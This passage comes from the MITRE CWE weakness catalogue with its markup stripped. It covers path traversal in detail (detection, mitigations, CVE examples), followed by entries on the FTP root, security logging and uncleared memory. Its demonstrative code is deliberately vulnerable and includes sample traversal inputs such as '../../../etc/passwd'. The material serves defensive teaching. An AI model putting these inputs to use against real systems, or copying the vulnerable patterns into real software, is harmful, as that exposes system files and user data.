areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the software's administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability. - High - - - Manual Static Analysis - Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints. - High - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - - - Cost effective for partial coverage: - - - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Fuzz Tester - Framework-based Fuzzer - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Implementation - Input Validation - - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes: - - - realpath() in C - getCanonicalPath() in Java - GetFullPath() in ASP.NET - realpath() or abs_path() in Perl - realpath() in PHP - - - - - - Architecture and Design - Libraries or Frameworks - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - - - Operation - Firewall - Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. - Moderate - An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Enforcement by Conversion - - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability. - - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - Architecture and Design - Operation - Attack Surface Reduction - - Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately. - This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface. - - - - Implementation - - Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. - If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. - Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. - In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy. - - - - Operation - Implementation - Environment Hardening - When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - - - - - The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory. - - my $dataPath = "/users/cwe/profiles";my $username = param("user");my $profilePath = $dataPath . "/" . $username; - open(my $fh, "<$profilePath") || ExitError("profile read error: $profilePath");print "<ul>\n";while (<$fh>) {print "<li>$_</li>\n";}print "</ul>\n"; - - While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as: - - ../../../etc/passwd - - The program would generate a profile pathname like this: - - /users/cwe/profiles/../../../etc/passwd - - When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file: - - /etc/passwd - - As a result, the attacker could read the entire text of the password file. - Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined. - - - In the example below, the path to a dictionary file is read from a system property and used to initialize a File object. - - String filename = System.getProperty("com.domain.application.dictionaryFile");File dictionaryFile = new File(filename); - - However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory. - - - The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). - - - The following code attempts to validate a given input path by checking it against an allowlist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string "/safe_dir/". - - String path = getInputPath();if (path.startsWith("/safe_dir/")){File f = new File(path);f.delete()} - - An attacker could provide an input such as this: - - /safe_dir/../important.dat - - The software assumes that the path is valid because it starts with the "/safe_path/" sequence, but the "../" sequence will cause the program to delete the important.dat file in the parent directory - - - The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. - - <form action="FileUploadServlet" method="post" enctype="multipart/form-data"> - Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> - </form> - - When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. - - public class FileUploadServlet extends HttpServlet { - - ... - protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - - response.setContentType("text/html");PrintWriter out = response.getWriter();String contentType = request.getContentType(); - // the starting position of the boundary headerint ind = contentType.indexOf("boundary=");String boundary = contentType.substring(ind+9); - String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value - // verify that content type is multipart form dataif (contentType != null && contentType.indexOf("multipart/form-data") != -1) { - - // extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));... - // output the file to the local upload directorytry { - BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {if (line.indexOf(boundary) == -1) {bw.write(line);bw.newLine();bw.flush();}} //end of for loopbw.close(); - - - } catch (IOException ex) {...}// output successful upload response HTML page - }// output unsuccessful upload response HTML pageelse{...} - }... - - } - - This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. - Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. - - - - - CVE-2010-0467 - Newsletter module allows reading arbitrary files using "../" sequences. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0467 - - - CVE-2009-4194 - FTP server allows deletion of arbitrary files using ".." in the DELE command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4194 - - - CVE-2009-4053 - FTP server allows creation of arbitrary directories using ".." in the MKD command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4053 - - - CVE-2009-0244 - FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using ".." sequences. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0244 - - - CVE-2009-4013 - Software package maintenance program allows overwriting arbitrary files using "../" sequences. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4013 - - - CVE-2009-4449 - Bulletin board allows attackers to determine the existence of files using the avatar. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4449 - - - CVE-2009-4581 - PHP program allows arbitrary code execution using ".." in filenames that are fed to the include() function. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4581 - - - CVE-2010-0012 - Overwrite of files using a .. in a Torrent file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0012 - - - CVE-2010-0013 - Chat program allows overwriting files using a custom smiley request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013 - - - CVE-2008-5748 - Chain: external control of values for user's desired language and theme enables path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748 - - - CVE-2009-1936 - Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936 - - - - File Processing - - - File or Directory - - - - Path Traversal - - - A4 - Insecure Direct Object Reference - CWE More Specific - - - A2 - Broken Access Control - CWE More Specific - - - FIO02-C - Canonicalize path names originating from untrusted sources - - - IDS00-PL - Canonicalize path names before validating them - Exact - - - 33 - Path Traversal - - - SFP16 - Path Traversal - - - ASCSM-CWE-22 - - - - - - - - - - - - - - - - - - - - Pathname equivalence can be regarded as a type of canonicalization error. - Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing "/" on a filename could bypass access rules that don't expect a trailing /, causing a server to provide the file when it normally would not). - - Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use "directory traversal" only to refer to the injection of ".." and equivalent sequences whose specific meaning is to traverse directories. - Other variants like "absolute pathname" and "drive letter" have the *effect* of directory traversal, but some people may not call it such, since it doesn't involve ".." or equivalent. - - Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap. - - Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that "..\" is vulnerable, but not test "../" which may also be vulnerable. - Any combination of directory separators ("/", "\", etc.) and numbers of "." (e.g. "....") can produce unique variants; for example, the "//../" variant is not listed (CVE-2004-0325). See this entry's children and lower-level descendants. - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Observed_Examples - - - CWE Content Team - MITRE - 2013-07-17 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-05-03 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Relevant_Properties, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships, Type - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Path Traversal - - - - The application stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties. - - - - - - - - Various Unix FTP servers require a password file that is under the FTP root, due to use of chroot. - - - - Operation - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Confidentiality - Read Application Data - - - - - Implementation - System Configuration - Avoid storing information under the FTP root directory. - - - System Configuration - Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the FTP directory. - - - - - Sensitive Data Under FTP Root - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Background_Details, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - Sensitive Data Under FTP Root - - - - The software does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis. - This can be resultant, e.g. a buffer overflow might trigger a crash before the product can log the event. - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Non-Repudiation - Hide Activities - - - - - Information loss or omission - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The application truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack. - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Non-Repudiation - Hide Activities - The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice. - - - - - CVE-2005-0585 - Web browser truncates long sub-domains or paths, facilitating phishing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0585 - - - CVE-2004-2032 - Bypass URL filter via a long URL with a large number of trailing hex-encoded space characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2032 - - - CVE-2003-0412 - Does not log complete URI of a long request (truncation). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0412 - - - - - Truncation of Security-relevant Information - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The application does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Operation - - - - - Non-Repudiation - Hide Activities - The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice. - - - - - This code logs suspicious multiple login attempts. - - function login($userName,$password){ - if(authenticate($userName,$password)){return True;}else{incrementLoginAttempts($userName);if(recentLoginAttempts($userName) > 5){writeLog("Failed login attempt by User: " . $userName . " at " + date('r') );}} - } - - This code only logs failed login attempts when a certain limit is reached. If an attacker knows this limit, they can stop their attack from being discovered by avoiding the limit. - - - - - CVE-1999-1029 - Login attempts not recorded if user disconnects before maximum number of tries. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1029 - - - CVE-2002-1839 - Sender's IP address not recorded in outgoing e-mail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1839 - - - CVE-2000-0542 - Failed authentication attempt not recorded if later attempt succeeds. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0542 - - - - - Omission of Security-relevant Information - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software records security-relevant information according to an alternate name of the affected entity, instead of the canonical name. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Non-Repudiation - Access Control - Hide Activities - Gain Privileges or Assume Identity - - - - - This code prints the contents of a file if a user has permission. - - function readFile($filename){ - $user = getCurrentUser();$realFile = $filename; - - //resolve file if its a symbolic link - if(is_link($filename)){$realFile = readlink($filename);} - if(fileowner($realFile) == $user){echo file_get_contents($realFile);return;}else{echo 'Access denied';writeLog($user . ' attempted to access the file '. $filename . ' on '. date('r'));} - } - - While the code logs a bad access attempt, it logs the user supplied name for the file, not the canonicalized file name. An attacker can obscure their target by giving the script the name of a link to the file they are attempting to access. Also note this code contains a race condition between the is_link() and readlink() functions (CWE-363). - - - - - CVE-2002-0725 - Attacker performs malicious actions on a hard link to a file, obscuring the real target file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725 - - - - - Obscured Security-relevant Information by Alternate Name - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This weakness can be found at CWE-199. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Name - - DEPRECATED (Duplicate): General Information Management Problems - - - - The product releases a resource such as memory or a file so that it can be made available for reuse, but it does not clear or "zeroize" the information contained in the resource before the product performs a critical state transition or makes the resource available for reuse by other entities. - - When resources are released, they can be made available for reuse. For example, after memory is de-allocated, an operating system may make the memory available to another process, or disk space may be reallocated when a file is deleted. As removing information requires time and additional resources, operating systems do not usually clear the previously written information. - Even when the resource is reused by the same process, this weakness can arise when new data is not as large as the old data, which leaves portions of the old data still available. Equivalent errors can occur in other situations where the length of data is variable but the associated data structure is not. If memory is not cleared after use, the information may be read by less trustworthy parties when the memory is reallocated. - This weakness can apply in hardware, such as when a device or system switches between power, sleep, or debug states during normal operation, or when execution changes to different users or privilege levels. - - - - - - - - - Primary - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Manual Analysis - Write a known pattern into each sensitive location. Trigger the release of the resource or cause the desired state transition to occur. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the product needs to be fixed. Note that this test can likely be automated. - High - - - - - Architecture and Design - Implementation - During critical state transitions, information not needed in the next state should be removed or overwritten with fixed patterns (such as all 0's) or random data, before the transition to the next state. - High - - - Architecture and Design - Implementation - When releasing, de-allocating, or deleting a resource, overwrite its data and relevant metadata with fixed patterns or random data. Be cautious about complex resource types whose underlying representation might be non-contiguous or change at a low level, such as how a file might be split into different chunks on a file system, even though "logical" file positions are contiguous at the application layer. Such resource types might require invocation of special modes or APIs to tell the underlying operating system to perform the necessary clearing, such as SDelete (Secure Delete) on Windows, although the appropriate functionality might not be available at the application layer. - High - - - - - This example shows how an attacker can take advantage of an incorrect state transition. - - Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible. - - - During the transition from A to B, the device does not scrub the memory. - - After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys. - For transition from state A to state B, remove information which should not be available once the transition is complete. - - - The following code calls realloc() on a buffer containing sensitive data: - - cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024); - - There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data. - - - - - CVE-2003-0001 - Ethernet NIC drivers do not pad frames with null bytes, leading to infoleak from malformed packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0001 - - - CVE-2003-0291 - router does not clear information from DHCP packets that have been previously used - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291 - - - CVE-2005-1406 - Products do not fully clear memory buffers when less data is stored into the buffer than previous. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1406 - - - CVE-2005-1858 - Products do not fully clear memory buffers when less data is stored into the buffer than previous. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858 - - - CVE-2005-3180 - Products do not fully clear memory buffers when less data is stored into the buffer than previous. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3180 - - - CVE-2005-3276 - Product does not clear a data structure before writing to part of it, yielding information leak of previously used memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3276 - - - CVE-2002-2077 - Memory not properly cleared before reuse. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2077 - - - - Memory Management - Networking - - - Memory - - - - Sensitive Information Uncleared Before Use - - - MEM03-C - Clear sensitive information stored in reusable resources returned for reuse - - - SFP23 - Exposed Data - - - - - - - There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000). - This entry needs modification to clarify the differences with CWE-212. The description also combines two problems that are distinct from the CWE research perspective: the inadvertent transfer of information to another sphere, and improper initialization/shutdown. Some of the associated taxonomy mappings reflect these different uses. - This is frequently found for network packets, but it can also exist in local memory allocation, files, etc. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Maintenance_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated 